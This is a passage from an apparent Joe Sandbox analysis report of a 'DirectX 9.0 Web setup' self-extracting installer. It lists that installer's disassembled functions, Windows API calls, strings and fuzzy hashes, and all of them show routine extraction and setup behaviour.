                                                                                                • SizeofResource.KERNEL32(00000000,00000000,?,01004C70,TITLE,DirectX 9.0 Web setup,0000007F,?,00000000), ref: 01002A4C
                                                                                                • FindResourceA.KERNEL32(00000000,00000000,0000000A), ref: 01002A68
                                                                                                • LoadResource.KERNEL32(00000000,00000000,?,01004C70,TITLE,DirectX 9.0 Web setup,0000007F,?,00000000), ref: 01002A6C
                                                                                                • LockResource.KERNEL32(00000000,?,01004C70,TITLE,DirectX 9.0 Web setup,0000007F,?,00000000), ref: 01002A73
                                                                                                • FreeResource.KERNEL32(00000000,?,01004C70,TITLE,DirectX 9.0 Web setup,0000007F,?,00000000), ref: 01002A97
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000002.00000002.3900862467.0000000001001000.00000020.00000001.01000000.00000005.sdmp, Offset: 01000000, based on PE: true
                                                                                                • Associated: 00000002.00000002.3900743063.0000000001000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                • Associated: 00000002.00000002.3900957095.000000000100A000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                • Associated: 00000002.00000002.3901069335.000000000100C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_2_2_1000000_UNK_.jbxd
                                                                                                Similarity
                                                                                                • API ID: Resource$Find$FreeLoadLockSizeof
                                                                                                • String ID: DirectX 9.0 Web setup
                                                                                                • API String ID: 468261009-3102400635
                                                                                                • Opcode ID: 60513ed6fa868ebe5019eda0ed49016e3eb50df202396a8709f0f5900e5d54f2
                                                                                                • Instruction ID: b81af5958d1d79e739a71e668ea852868a10399b4e191fd1668772ccbe63b742
                                                                                                • Opcode Fuzzy Hash: 60513ed6fa868ebe5019eda0ed49016e3eb50df202396a8709f0f5900e5d54f2
                                                                                                • Instruction Fuzzy Hash: D301D631700148BBEB339B66AC88D7F7BADFB8A791F044019F986C7144CA768880DB61
                                                                                                Function 0100383D Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 50COMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • EndDialog.USER32(?,?), ref: 01003878
                                                                                                • GetDesktopWindow.USER32 ref: 01003882
                                                                                                • SetWindowTextA.USER32(?,DirectX 9.0 Web setup), ref: 01003898
                                                                                                • SetDlgItemTextA.USER32(?,00000838), ref: 010038AA
                                                                                                • SetForegroundWindow.USER32(?), ref: 010038B1
                                                                                                • EndDialog.USER32(?,00000002), ref: 010038BE
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000002.00000002.3900862467.0000000001001000.00000020.00000001.01000000.00000005.sdmp, Offset: 01000000, based on PE: true
                                                                                                • Associated: 00000002.00000002.3900743063.0000000001000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                • Associated: 00000002.00000002.3900957095.000000000100A000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                • Associated: 00000002.00000002.3901069335.000000000100C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_2_2_1000000_UNK_.jbxd
                                                                                                Similarity
                                                                                                • API ID: Window$DialogText$DesktopForegroundItem
                                                                                                • String ID: DirectX 9.0 Web setup
                                                                                                • API String ID: 852535152-3102400635
                                                                                                • Opcode ID: 75a087d82200ebd705203d3342fd985e8dff23fa491e07dc86cdd8fdf240c47c
                                                                                                • Instruction ID: 5c13e9e4d6d24029a2895105e5d04483bb2c3333f3e538078e74f50813a3fb26
                                                                                                • Opcode Fuzzy Hash: 75a087d82200ebd705203d3342fd985e8dff23fa491e07dc86cdd8fdf240c47c
                                                                                                • Instruction Fuzzy Hash: 7E017C31510214AFFB675BA8D8089ED7B94FB05741F004891FAC2DA0C5CB7ACB41CBE0
                                                                                                Function 01002691 Relevance: 12.1, APIs: 8, Instructions: 123memoryCOMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • GlobalFree.KERNEL32(00000000), ref: 010027EB
                                                                                                  • Part of subcall function 01002081: CharUpperA.USER32(?,00000001,?,00000000), ref: 010020A8
                                                                                                  • Part of subcall function 01002081: CharNextA.USER32(?), ref: 010020B7
                                                                                                  • Part of subcall function 01002081: CharNextA.USER32(00000000), ref: 010020BA
                                                                                                  • Part of subcall function 01002081: lstrcpyA.KERNEL32(?,Software\Microsoft\Windows\CurrentVersion\App Paths), ref: 010020EA
                                                                                                  • Part of subcall function 01002081: RegOpenKeyExA.ADVAPI32(80000002,?,00000000,00020019,?,?,00000000), ref: 01002110
                                                                                                  • Part of subcall function 01002081: RegQueryValueExA.ADVAPI32(?,01001251,00000000,?,?,?), ref: 01002133
                                                                                                  • Part of subcall function 01002081: ExpandEnvironmentStringsA.KERNEL32(?,?,00000104), ref: 0100214E
                                                                                                  • Part of subcall function 01002081: lstrcpyA.KERNEL32(?,?), ref: 01002162
                                                                                                  • Part of subcall function 01002081: RegCloseKey.ADVAPI32(?), ref: 01002176
                                                                                                • GetFileVersionInfoSizeA.VERSION(?,?,?,00000001,?,?,?,?,00000104,?,?,?,?,?,?,?), ref: 010026EF
                                                                                                • GlobalAlloc.KERNEL32(00000042,00000000,0000003C,?,0000003C,00000001,?,?,?,?,00000001,?,?,?,?,00000104), ref: 01002702
                                                                                                • GlobalLock.KERNEL32(00000000), ref: 01002714
                                                                                                • GetFileVersionInfoA.VERSION(0000003C,?,?,00000000), ref: 0100272E
                                                                                                • VerQueryValueA.VERSION(00000000,0100132C,0000003C,0000003C,0000003C,?,?,00000000), ref: 01002745
                                                                                                • GlobalUnlock.KERNEL32(00000000), ref: 010027AC
                                                                                                • GlobalUnlock.KERNEL32(00000000), ref: 010027FB
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000002.00000002.3900862467.0000000001001000.00000020.00000001.01000000.00000005.sdmp, Offset: 01000000, based on PE: true
                                                                                                • Associated: 00000002.00000002.3900743063.0000000001000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                • Associated: 00000002.00000002.3900957095.000000000100A000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                • Associated: 00000002.00000002.3901069335.000000000100C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_2_2_1000000_UNK_.jbxd
                                                                                                Similarity
                                                                                                • API ID: Global$Char$FileInfoNextQueryUnlockValueVersionlstrcpy$AllocCloseEnvironmentExpandFreeLockOpenSizeStringsUpper
                                                                                                • String ID:
                                                                                                • API String ID: 2416581039-0
                                                                                                • Opcode ID: d36b2cbb2bcf2f010609546f27dacd5adc000b5a5f889186ab3a9f49350142b4
                                                                                                • Instruction ID: 715b562a5a0b13aa3d3becab1fee66edbba7586ed49f21780c7e5d38fec6c3f0
                                                                                                • Opcode Fuzzy Hash: d36b2cbb2bcf2f010609546f27dacd5adc000b5a5f889186ab3a9f49350142b4
                                                                                                • Instruction Fuzzy Hash: 1B41717090020AEFEF12DF94CD88AEDBBF5FF44304F144069EA85A6591C7759980CF50
                                                                                                Function 01002ACD Relevance: 12.0, APIs: 8, Instructions: 42stringCOMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • lstrlenA.KERNEL32(00000104,?,?,?,01004972,?,00000104,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,?), ref: 01002ADB
                                                                                                • lstrlenA.KERNEL32(?,?,?,?,01004972,?,00000104,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,?), ref: 01002AE2
                                                                                                • lstrcpyA.KERNEL32(?,00000104,?,?,?,01004972,?,00000104,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,?), ref: 01002AF8
                                                                                                • lstrlenA.KERNEL32(?,?,?,?,01004972,?,00000104,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,?), ref: 01002AFF
                                                                                                • lstrlenA.KERNEL32(?,?,?,?,01004972,?,00000104,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,?), ref: 01002B09
                                                                                                • lstrlenA.KERNEL32(?,?,?,?,01004972,?,00000104,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,?), ref: 01002B13
                                                                                                • lstrlenA.KERNEL32(?,?,?,?,01004972,?,00000104,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,?), ref: 01002B1A
                                                                                                • lstrcatA.KERNEL32(?,?,?,?,?,01004972,?,00000104,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,?), ref: 01002B25
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000002.00000002.3900862467.0000000001001000.00000020.00000001.01000000.00000005.sdmp, Offset: 01000000, based on PE: true
                                                                                                • Associated: 00000002.00000002.3900743063.0000000001000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                • Associated: 00000002.00000002.3900957095.000000000100A000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                • Associated: 00000002.00000002.3901069335.000000000100C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_2_2_1000000_UNK_.jbxd
                                                                                                Similarity
                                                                                                • API ID: lstrlen$lstrcatlstrcpy
                                                                                                • String ID:
                                                                                                • API String ID: 2414487701-0
                                                                                                • Opcode ID: 7294cccf960f3f366eb54c5e099d3ec04d4912deaa84471d2f8e17bbbdc9ee5a
                                                                                                • Instruction ID: 5cb71324bf1073ba797ff75ade76f469c3bffa4559f515a1268d3d36d40ed6b7
                                                                                                • Opcode Fuzzy Hash: 7294cccf960f3f366eb54c5e099d3ec04d4912deaa84471d2f8e17bbbdc9ee5a
                                                                                                • Instruction Fuzzy Hash: 2701D63140829ABEEB23DF64DC48EAF3FE9DF4A310F044469F98492052CB75E0159BA1
                                                                                                Function 01002969 Relevance: 10.6, APIs: 7, Instructions: 84COMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • GetWindowRect.USER32(?,?), ref: 0100297F
                                                                                                • GetWindowRect.USER32(010017FA,?), ref: 01002994
                                                                                                • GetDC.USER32(?), ref: 010029A8
                                                                                                • GetDeviceCaps.GDI32(00000000,00000008), ref: 010029B4
                                                                                                • GetDeviceCaps.GDI32(010017FA,0000000A), ref: 010029C2
                                                                                                • ReleaseDC.USER32(?,010017FA), ref: 010029D1
                                                                                                • SetWindowPos.USER32(?,00000000,?,?,00000000,00000000,00000005), ref: 01002A27
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000002.00000002.3900862467.0000000001001000.00000020.00000001.01000000.00000005.sdmp, Offset: 01000000, based on PE: true
                                                                                                • Associated: 00000002.00000002.3900743063.0000000001000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                • Associated: 00000002.00000002.3900957095.000000000100A000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                • Associated: 00000002.00000002.3901069335.000000000100C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_2_2_1000000_UNK_.jbxd
                                                                                                Similarity
                                                                                                • API ID: Window$CapsDeviceRect$Release
                                                                                                • String ID:
                                                                                                • API String ID: 2212493051-0
                                                                                                • Opcode ID: e5b264a83dd9e846005674263491b2207fbfe43a598662fe0941c5ab6264e4cb
                                                                                                • Instruction ID: 4c28801afd84217de1cb5c416d2791a7d42eb7b966f216dd91684d3200acc53b
                                                                                                • Opcode Fuzzy Hash: e5b264a83dd9e846005674263491b2207fbfe43a598662fe0941c5ab6264e4cb
                                                                                                • Instruction Fuzzy Hash: 0B215932A0010AAFDF12CFBCCD899EEBBB9EB88310F008125F941E7254D735A9458B50
                                                                                                Function 01004481 Relevance: 10.6, APIs: 5, Strings: 2, Instructions: 73memoryCOMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                  • Part of subcall function 01002A34: FindResourceA.KERNEL32(00000000,00000000,0000000A), ref: 01002A48
                                                                                                  • Part of subcall function 01002A34: SizeofResource.KERNEL32(00000000,00000000,?,01004C70,TITLE,DirectX 9.0 Web setup,0000007F,?,00000000), ref: 01002A4C
                                                                                                  • Part of subcall function 01002A34: FindResourceA.KERNEL32(00000000,00000000,0000000A), ref: 01002A68
                                                                                                  • Part of subcall function 01002A34: LoadResource.KERNEL32(00000000,00000000,?,01004C70,TITLE,DirectX 9.0 Web setup,0000007F,?,00000000), ref: 01002A6C
                                                                                                  • Part of subcall function 01002A34: LockResource.KERNEL32(00000000,?,01004C70,TITLE,DirectX 9.0 Web setup,0000007F,?,00000000), ref: 01002A73
                                                                                                • LocalAlloc.KERNEL32(00000040,00000001,LICENSE,00000000,00000000,?,00000000,?,0100592D,00000000,01005A22,00000000,01005ACB,?,?,01005ACB), ref: 0100449B
                                                                                                • LocalFree.KERNEL32(00000000,000004B1,00000000,00000000,00000010,00000000,LICENSE,00000000,00000000,?,00000000,?,0100592D,00000000,01005A22,00000000), ref: 010044E8
                                                                                                  • Part of subcall function 010038CC: MessageBoxA.USER32(00000000,?,DirectX 9.0 Web setup,00000000), ref: 01003946
                                                                                                  • Part of subcall function 01003547: GetLastError.KERNEL32(75934B00,01004003), ref: 0100354E
                                                                                                  • Part of subcall function 01003547: GetLastError.KERNEL32 ref: 01003554
                                                                                                • LocalFree.KERNEL32(?,00000000,?,0100592D,00000000,01005A22,00000000,01005ACB,?,?,01005ACB,00000000), ref: 0100454D
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000002.00000002.3900862467.0000000001001000.00000020.00000001.01000000.00000005.sdmp, Offset: 01000000, based on PE: true
                                                                                                • Associated: 00000002.00000002.3900743063.0000000001000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                • Associated: 00000002.00000002.3900957095.000000000100A000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                • Associated: 00000002.00000002.3901069335.000000000100C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_2_2_1000000_UNK_.jbxd
                                                                                                Similarity
                                                                                                • API ID: Resource$Local$ErrorFindFreeLast$AllocLoadLockMessageSizeof
                                                                                                • String ID: <None>$LICENSE
                                                                                                • API String ID: 3899723493-383193767
                                                                                                • Opcode ID: 9d552bdc682831cc17b8e5f489639f4026cf8ed1a791820ee76a1c03ef31662f
                                                                                                • Instruction ID: 6e0dad04b0308800c6e7bb6f83685405a54a227f071ddc6dc43be68e18665347
                                                                                                • Opcode Fuzzy Hash: 9d552bdc682831cc17b8e5f489639f4026cf8ed1a791820ee76a1c03ef31662f
                                                                                                • Instruction Fuzzy Hash: 791172B4600245BEF7236F21ACC4D7B366DE704399F018024B6C5D94C9DBBB8D408B34
                                                                                                Function 01001DDF Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 41COMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • GetWindowsDirectoryA.KERNEL32(?,00000104,?), ref: 01001DF7
                                                                                                  • Part of subcall function 01005B32: lstrlenA.KERNEL32(01003456,0000002F,0100B89A,01003456,0100B89A,01001251), ref: 01005B39
                                                                                                  • Part of subcall function 01005B32: CharPrevA.USER32(01003456,00000000), ref: 01005B49
                                                                                                  • Part of subcall function 01005B32: lstrcpyA.KERNEL32(00000000,?), ref: 01005B66
                                                                                                • WritePrivateProfileStringA.KERNEL32(00000000,00000000,00000000,?), ref: 01001E1D
                                                                                                • _lopen.KERNEL32(?,00000040), ref: 01001E2C
                                                                                                • _llseek.KERNEL32(00000000,00000000,00000002), ref: 01001E3D
                                                                                                • _lclose.KERNEL32(00000000), ref: 01001E46
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000002.00000002.3900862467.0000000001001000.00000020.00000001.01000000.00000005.sdmp, Offset: 01000000, based on PE: true
                                                                                                • Associated: 00000002.00000002.3900743063.0000000001000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                • Associated: 00000002.00000002.3900957095.000000000100A000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                • Associated: 00000002.00000002.3901069335.000000000100C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_2_2_1000000_UNK_.jbxd
                                                                                                Similarity
                                                                                                • API ID: CharDirectoryPrevPrivateProfileStringWindowsWrite_lclose_llseek_lopenlstrcpylstrlen
                                                                                                • String ID: wininit.ini
                                                                                                • API String ID: 1211533111-4206010578
                                                                                                • Opcode ID: f92e39143841338b23a30a7285bd343bbb73fc4a946f94324873422716c0777d
                                                                                                • Instruction ID: b7b4abcde96b08424be1b8ef761040528c423947c2d44bd333b95f446d3817fe
                                                                                                • Opcode Fuzzy Hash: f92e39143841338b23a30a7285bd343bbb73fc4a946f94324873422716c0777d
                                                                                                • Instruction Fuzzy Hash: BCF0AFB6600194A7E732E7799D8CEEB3ABCAB85710F000095B7D9E30C0D6B8C9458B70
                                                                                                Function 0100366A Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 54filestringCOMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • lstrcpyA.KERNEL32(?,C:\Users\user\AppData\Local\Temp\IXP000.TMP\), ref: 0100368D
                                                                                                  • Part of subcall function 01005B32: lstrlenA.KERNEL32(01003456,0000002F,0100B89A,01003456,0100B89A,01001251), ref: 01005B39
                                                                                                  • Part of subcall function 01005B32: CharPrevA.USER32(01003456,00000000), ref: 01005B49
                                                                                                  • Part of subcall function 01005B32: lstrcpyA.KERNEL32(00000000,?), ref: 01005B66
                                                                                                • CreateFileA.KERNEL32(?,40000000,00000000,00000000,00000002,00000080,00000000,?,?), ref: 010036B8
                                                                                                • WriteFile.KERNEL32(00000000,?,?,?,00000000), ref: 010036E2
                                                                                                • CloseHandle.KERNEL32(00000000), ref: 010036FF
                                                                                                Strings
                                                                                                • C:\Users\user\AppData\Local\Temp\IXP000.TMP\, xrefs: 01003675
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000002.00000002.3900862467.0000000001001000.00000020.00000001.01000000.00000005.sdmp, Offset: 01000000, based on PE: true
                                                                                                • Associated: 00000002.00000002.3900743063.0000000001000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                • Associated: 00000002.00000002.3900957095.000000000100A000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                • Associated: 00000002.00000002.3901069335.000000000100C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_2_2_1000000_UNK_.jbxd
                                                                                                Similarity
                                                                                                • API ID: Filelstrcpy$CharCloseCreateHandlePrevWritelstrlen
                                                                                                • String ID: C:\Users\user\AppData\Local\Temp\IXP000.TMP\
                                                                                                • API String ID: 3080743287-1193786559
                                                                                                • Opcode ID: f3c43e67ddf95b47fdb9e484ccd9ecd1a78d65d94e8c236f23dda56cc12f1390
                                                                                                • Instruction ID: 19b174ac764301658f5366c9defac34423b59d1cd1d6115009132bdfdfa86dce
                                                                                                • Opcode Fuzzy Hash: f3c43e67ddf95b47fdb9e484ccd9ecd1a78d65d94e8c236f23dda56cc12f1390
                                                                                                • Instruction Fuzzy Hash: 48114F71900218EBDB22DF55DC88EDE7F7CFB49760F108155F58596184C7B59A84CFA0
                                                                                                Function 01004161 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 48COMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • FindResourceA.KERNEL32(00000000,?,00000005), ref: 01004170
                                                                                                • LoadResource.KERNEL32(00000000,00000000,?,01004E32,000007D6,00000000,010017B1,00000547,0000083E,?,?,00000000), ref: 0100417E
                                                                                                • DialogBoxIndirectParamA.USER32(00000000,00000000,?,0000083E,00000547), ref: 0100419D
                                                                                                • FreeResource.KERNEL32(00000000,?,01004E32,000007D6,00000000,010017B1,00000547,0000083E,?,?,00000000), ref: 010041A6
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000002.00000002.3900862467.0000000001001000.00000020.00000001.01000000.00000005.sdmp, Offset: 01000000, based on PE: true
                                                                                                • Associated: 00000002.00000002.3900743063.0000000001000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                • Associated: 00000002.00000002.3900957095.000000000100A000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                • Associated: 00000002.00000002.3901069335.000000000100C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_2_2_1000000_UNK_.jbxd
                                                                                                Similarity
                                                                                                • API ID: Resource$DialogFindFreeIndirectLoadParam
                                                                                                • String ID: DirectX 9.0 Web setup
                                                                                                • API String ID: 1214682469-3102400635
                                                                                                • Opcode ID: e997d8be0718b2931c3f9f962151c7850337d5e5bb85679e49a3f60c032731a3
                                                                                                • Instruction ID: 90e970f1d2589a349edb739379ec95ef873ddad6063cdbf399ebe6a889d0bac2
                                                                                                • Opcode Fuzzy Hash: e997d8be0718b2931c3f9f962151c7850337d5e5bb85679e49a3f60c032731a3
                                                                                                • Instruction Fuzzy Hash: 21018172300219BFEB235FA9AC88DEF7AADEB553A4F014465FB81A6080C7758C5087E4
                                                                                                Function 0100370F Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 28librarystringCOMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • lstrcpyA.KERNEL32(?,C:\Users\user\AppData\Local\Temp\IXP000.TMP\), ref: 01003724
                                                                                                  • Part of subcall function 01005B32: lstrlenA.KERNEL32(01003456,0000002F,0100B89A,01003456,0100B89A,01001251), ref: 01005B39
                                                                                                  • Part of subcall function 01005B32: CharPrevA.USER32(01003456,00000000), ref: 01005B49
                                                                                                  • Part of subcall function 01005B32: lstrcpyA.KERNEL32(00000000,?), ref: 01005B66
                                                                                                • GetFileAttributesA.KERNEL32(?,?,00000000), ref: 01003740
                                                                                                • LoadLibraryExA.KERNEL32(?,00000000,00000008), ref: 0100375A
                                                                                                • LoadLibraryA.KERNEL32(00000000), ref: 01003765
                                                                                                Strings
                                                                                                • C:\Users\user\AppData\Local\Temp\IXP000.TMP\, xrefs: 01003718
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000002.00000002.3900862467.0000000001001000.00000020.00000001.01000000.00000005.sdmp, Offset: 01000000, based on PE: true
                                                                                                • Associated: 00000002.00000002.3900743063.0000000001000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                • Associated: 00000002.00000002.3900957095.000000000100A000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                • Associated: 00000002.00000002.3901069335.000000000100C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_2_2_1000000_UNK_.jbxd
                                                                                                Similarity
                                                                                                • API ID: LibraryLoadlstrcpy$AttributesCharFilePrevlstrlen
                                                                                                • String ID: C:\Users\user\AppData\Local\Temp\IXP000.TMP\
                                                                                                • API String ID: 4003292530-1193786559
                                                                                                • Opcode ID: 2a1abe798eeda10e1ecd94666a9ff7b2e6d0c61b8320ab0a73d9c68e693d9404
                                                                                                • Instruction ID: 9f94e3723cca4d266b99732e7a80262a7a37e234bfc11ab39ee7921fbbd2d32f
                                                                                                • Opcode Fuzzy Hash: 2a1abe798eeda10e1ecd94666a9ff7b2e6d0c61b8320ab0a73d9c68e693d9404
                                                                                                • Instruction Fuzzy Hash: E8F05EB4900608AFEB22AB64DE89EC97B68BB14305F404590F2C9E50C0D7B9E6898F50
                                                                                                Function 01001946 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 21registryCOMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • RegOpenKeyExA.ADVAPI32(80000002,Software\Microsoft\Windows\CurrentVersion\RunOnce,00000000,00020006,?,?,00000000,01002F6A,?,00000000), ref: 01001968
                                                                                                • RegDeleteValueA.ADVAPI32(?,wextract_cleanup0,?,00000000,01002F6A,?,00000000), ref: 0100197A
                                                                                                • RegCloseKey.ADVAPI32(?,?,00000000,01002F6A,?,00000000), ref: 01001983
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000002.00000002.3900862467.0000000001001000.00000020.00000001.01000000.00000005.sdmp, Offset: 01000000, based on PE: true
                                                                                                • Associated: 00000002.00000002.3900743063.0000000001000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                • Associated: 00000002.00000002.3900957095.000000000100A000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                • Associated: 00000002.00000002.3901069335.000000000100C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_2_2_1000000_UNK_.jbxd
                                                                                                Similarity
                                                                                                • API ID: CloseDeleteOpenValue
                                                                                                • String ID: Software\Microsoft\Windows\CurrentVersion\RunOnce$wextract_cleanup0
                                                                                                • API String ID: 849931509-702805525
                                                                                                • Opcode ID: 458768e2f170180f9e320fe5dbc18e42d63c941c0fb649dab67b6fa9c1c2255c
                                                                                                • Instruction ID: ccbb5ff6748fd46fc05444b67dc659029424084cb7ec84c162ec529ad60e6887
                                                                                                • Opcode Fuzzy Hash: 458768e2f170180f9e320fe5dbc18e42d63c941c0fb649dab67b6fa9c1c2255c
                                                                                                • Instruction Fuzzy Hash: D3E04F30740358FBF733CB959D0EF697AACA700788F100058F2C1A1095D7F6D5009714
                                                                                                Function 01004657 Relevance: 7.6, APIs: 3, Strings: 2, Instructions: 57memoryCOMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                  • Part of subcall function 01002A34: FindResourceA.KERNEL32(00000000,00000000,0000000A), ref: 01002A48
                                                                                                  • Part of subcall function 01002A34: SizeofResource.KERNEL32(00000000,00000000,?,01004C70,TITLE,DirectX 9.0 Web setup,0000007F,?,00000000), ref: 01002A4C
                                                                                                  • Part of subcall function 01002A34: FindResourceA.KERNEL32(00000000,00000000,0000000A), ref: 01002A68
                                                                                                  • Part of subcall function 01002A34: LoadResource.KERNEL32(00000000,00000000,?,01004C70,TITLE,DirectX 9.0 Web setup,0000007F,?,00000000), ref: 01002A6C
                                                                                                  • Part of subcall function 01002A34: LockResource.KERNEL32(00000000,?,01004C70,TITLE,DirectX 9.0 Web setup,0000007F,?,00000000), ref: 01002A73
                                                                                                • LocalAlloc.KERNEL32(00000040,00000001,FINISHMSG,00000000,00000000,?,00000000,?,?,010059FB), ref: 01004672
                                                                                                • LocalFree.KERNEL32(00000000,?,00000000,?,?,010059FB), ref: 010046C9
                                                                                                  • Part of subcall function 010038CC: MessageBoxA.USER32(00000000,?,DirectX 9.0 Web setup,00000000), ref: 01003946
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000002.00000002.3900862467.0000000001001000.00000020.00000001.01000000.00000005.sdmp, Offset: 01000000, based on PE: true
                                                                                                • Associated: 00000002.00000002.3900743063.0000000001000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                • Associated: 00000002.00000002.3900957095.000000000100A000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                • Associated: 00000002.00000002.3901069335.000000000100C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_2_2_1000000_UNK_.jbxd
                                                                                                Similarity
                                                                                                • API ID: Resource$FindLocal$AllocFreeLoadLockMessageSizeof
                                                                                                • String ID: <None>$FINISHMSG
                                                                                                • API String ID: 1166655539-3091758298
                                                                                                • Opcode ID: 9fc84565805aa23d4fd31d628d8c3b998d3dee3f2991ba92e449fc6c41aa1772
                                                                                                • Instruction ID: c5b0bc608187105c25715251356598fe5d23ec77e1943fddc57e6d3d47a5b5c3
                                                                                                • Opcode Fuzzy Hash: 9fc84565805aa23d4fd31d628d8c3b998d3dee3f2991ba92e449fc6c41aa1772
                                                                                                • Instruction Fuzzy Hash: 5CF06D71241219BBF22366239C49F9B3E4CDB4A7D9F020151BBC5A50C2EAAAF400417D
                                                                                                Function 01005B71 Relevance: 7.5, APIs: 5, Instructions: 44stringCOMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • lstrlenA.KERNEL32(75920440,?,00000000,75A73530,75920440,0100228C,?,?,7591E800), ref: 01005B7C
                                                                                                • CharPrevA.USER32(75920440,00000000,?,7591E800), ref: 01005B8C
                                                                                                • CharPrevA.USER32(75920440,00000000,?,7591E800), ref: 01005B98
                                                                                                • CharPrevA.USER32(75920440,00000000,?,7591E800), ref: 01005BAB
                                                                                                • CharNextA.USER32(00000000,?,7591E800), ref: 01005BB3
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000002.00000002.3900862467.0000000001001000.00000020.00000001.01000000.00000005.sdmp, Offset: 01000000, based on PE: true
                                                                                                • Associated: 00000002.00000002.3900743063.0000000001000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                • Associated: 00000002.00000002.3900957095.000000000100A000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                • Associated: 00000002.00000002.3901069335.000000000100C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_2_2_1000000_UNK_.jbxd
                                                                                                Similarity
                                                                                                • API ID: Char$Prev$Nextlstrlen
                                                                                                • String ID:
                                                                                                • API String ID: 295585802-0
                                                                                                • Opcode ID: 4b52c76db2cf62ff621c8a08fa6ba7fb40a7dbd169611f4951299f618a72bbfa
                                                                                                • Instruction ID: 9baf6fa903052a509665a9fab5b6fb85594512577d769c7e3968725e671f5898
